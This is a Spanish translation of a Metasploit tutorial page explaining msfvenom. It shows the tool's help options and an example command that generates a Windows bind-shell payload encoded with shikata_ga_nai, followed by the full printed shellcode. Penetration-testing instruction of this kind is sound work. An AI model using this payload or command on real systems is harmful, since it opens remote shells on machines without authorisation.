Msfvenom

De www.metasploit-es.com.ar

Msfvenom

msfvenom es una combinacion de msfpayload y msfencode, uniendo ambas herramientas en una unica instancia del framework. Las ventajas de msfvenom son:

  • Una unica herramienta
  • Opciones de linea de comandos estandarizadas
  • Velocidad aumentada

En el punto actual msfvenom esta todavia en su infancia, pero contiene muchas opciones: 

  root@bt:~# /pentest/exploits/framework3/msfvenom -h
  Usage: /pentest/exploits/framework3/msfvenom [options] 
  Options:
   -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
   -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
   -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
   -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
   -e, --encoder    [encoder]       The encoder to use
   -a, --arch       [architecture]  The architecture to use
       --platform   [platform]
                                    The platform of the payload
   -s, --space      [length]        The maximum size of the resulting payload
   -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
   -i, --iterations [count]         The number of times to encode the payload
   -x, --template   [path]          Specify a custom executable file to use as a template
   -k, --keep                       Preserve the template behavior and inject the payload as a new thread
   -h, --help                       Show this message

Un ejemplo del uso de msfvenom puede verse a continuacion: 

  root@bt:~# /pentest/exploits/framework3/msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3
  [*] x86/shikata_ga_nai succeeded with size 325 (iteration=1)
  [*] x86/shikata_ga_nai succeeded with size 352 (iteration=2)
  [*] x86/shikata_ga_nai succeeded with size 379 (iteration=3)
  buf = 
  "\xdb\xdb\xbe\x0a\x3a\xfc\x6d\xd9\x74\x24\xf4\x5a\x29\xc9" +
  "\xb1\x52\x31\x72\x18\x83\xea\xfc\x03\x72\x1e\xd8\x09\xb6" +
  "\xce\xc5\x86\x6d\x1a\xa8\xd8\x88\xa8\xbc\x51\x64\xe5\xf2" +
  "\xd1\xb7\x80\xed\x66\x72\x6e\x0d\x1c\x68\x6a\xae\xcd\x0e" +
  "\x33\x90\x1d\x73\x82\xd8\xd7\xe0\x87\x76\xbd\x25\xf4\x23" +
  "\x4d\x38\xc2\xc3\xe9\xa1\x7e\x31\xc5\xe4\x84\x2a\x3b\x37" +
  "\xb3\xd6\x13\xc4\x09\x89\xd0\x95\x21\x10\x6b\x83\x94\x3d" +
  "\xf2\xfd\x19\x36\x18\xc4\x0a\x45\x51\x12\xda\x65\x29\xfb" +
  "\x8a\xdf\x29\x16\x88\xb9\x85\x9d\x55\x2b\x6e\x05\x60\xc9" +
  "\x07\x2d\x3c\x33\xf7\xac\x6c\xbf\x4b\x6d\x91\x35\x29\x59" +
  "\x38\xfe\x18\x38\x12\x72\xd4\x1d\xbd\x6d\x05\x79\xa6\x4e" +
  "\x58\xb0\x4a\x0e\x4c\x05\x5e\x51\x45\x70\xdc\x90\x93\xa9" +
  "\x21\x99\xd6\xab\xa7\x04\x11\x5d\x0e\x21\xa0\x96\xdd\x1f" +
  "\x86\x39\x71\xab\xb1\x87\x58\xb3\xd1\x3a\x2d\x5f\xb3\x6f" +
  "\xd0\xb1\x01\xf0\xed\x1c\x9f\x87\x59\x3d\x98\x80\xbb\x6d" +
  "\xa8\x7e\x17\xc4\x3c\xb4\xef\x3c\x48\xbe\x07\x51\x04\x9f" +
  "\x6f\xaf\xff\x16\xdc\x66\x77\xb4\x11\x00\xae\x0a\x66\x7b" +
  "\x28\x2b\xd3\x19\x3e\xcb\x98\xbf\xfd\x7b\x14\x7a\xbf\xa2" +
  "\x06\x46\x90\x19\x71\x6d\x28\xf5\x1c\xe5\x9c\x40\x88\x48" +
  "\x5d\xe2\x89\xb2\xba\x21\x7b\xdb\xe1\x60\x70\x1e\x55\x93" +
  "\x22\xf3\x6d\xbf\x5b\xc3\x74\x1e\x49\x43\x05\xdf\xdf\x9f" +
  "\x3a\x9f\x80\xfe\xed\x8a\xa5\xf7\x09\xf5\xf8\x6b\x24\xbb" +
  "\x20\x28\xfc\x03\x9a\xeb\xcf\x23\xbc\x50\xec\xca\x34\x3c" +
  "\x58\x94\x18\xcb\x51\x71\x19\x5f\x2d\xbf\x58\x45\x86\x29" +
  "\xb3\x9a\x87\x85\xf5\x40\x1d\xc6\x72\xbb\x3d\x60\x79\x3f" +
  "\xff\xc7"

El comando y el shellcode resultante de arriba generan una bind shell Windows con tres iteraciones del codificador shikata ga nai sin bytes nulos en el shellcode.



© Offensive Security 2009 

Original de www.offensive-security.com
Traducido por cbk999
Obtenido de «http://www.metasploit-es.com.ar/wiki/index.php/Msfvenom»
Herramientas personales